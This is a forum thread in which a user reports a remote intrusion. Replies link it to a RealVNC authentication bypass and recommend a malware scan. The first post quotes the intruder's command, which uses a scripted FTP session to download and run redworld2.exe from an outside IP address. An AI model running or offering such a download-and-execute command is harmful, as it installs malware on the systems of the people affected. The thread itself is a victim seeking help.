Have I just been hacked?

P

Phire

Baseband Member
Messages
90
Wierd thing happened recently...

i was minding my own business when suddenly my start button was pressed without me pressing anything...then the "Run..." dialog box opened...and this was pasted inside: "cmd /c echo OPEN 80.121.107.111 9382>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit" ... and then the cmd.exe window popped open and said it opened my binary mode data connection.

wtf is redworld. virus? trojan?

Edit: Did some research and found out it has something to do with the software "VNC 4.1.1". Anyone care to delve deeper into this wierd problem?
 
VNC is a remote desktop software. I would check if you have it installed on your computer.
 
security hole has surfaced in a program IT administrators use to access remote machines, but fixes are available.

A flaw in the authentication process of RealVNC (Virtual Network Computing) software could allow attackers to gain remote access to an affected VNC server and compromise it, Cupertino, Calif.-based AV giant Symantec Corp. warned in a message to customers of its DeepSight Threat Management System.

"During the initial handshake and authentication process between VNC clients and servers, a list of authentication methods is sent to clients," Symantec said. "The client chooses a method and returns a byte specifying the method it wishes to continue with."

The flaw appears because the server doesn't properly validate that the requested method sent by the client is actually one of the methods allowed by the server. "This issue allows remote attackers to request an anonymous authentication method, which will be incorrectly accepted by the server," Symantec said. "This allows them to gain full control of the VNC server session."

However there is a fix for this issue, or it is the upgrade. I haven't tested it or read it completly.
http://searchsecurity.techtarget.com...188531,00.html
 
VNC stands for Virtual Network Computing. It's basically a Remote Access Tool that lets you connect to a network over the internet. It's useful to allow people that work in a corporate enviroment to work from home. Because of the nature of these programs, they can be exploited to be used for trojans and such. Unless you use one of these programs for work, you probably have been infected with a trojan of some sort. Assuming you have antivirus/spyware, do a full system scan.

Doing a quick google for redworld2.exe just confirmed that it is definately malware. Scan for viruses ASAP.
 
You must log in or register to reply here.

Similar threads

C
Hacked by malware
2
Replies
10
Views
8K
PP Mguire
PP Mguire
I
I Desperately Need Some Help.
Replies
1
Views
1K
PP Mguire
PP Mguire
S
I just nearly crapped my self. Have you seen this forum I just found.
Replies
8
Views
1K
PP Mguire
PP Mguire
I
Did I get hacked?
2 3
Replies
25
Views
12K
Yami
Yami
J
Chrome Downloaded "fl_setup.exe" and Virus Total Says It's Virus - Now What?
2
Replies
13
Views
5K
connchri
connchri
Back
Top Bottom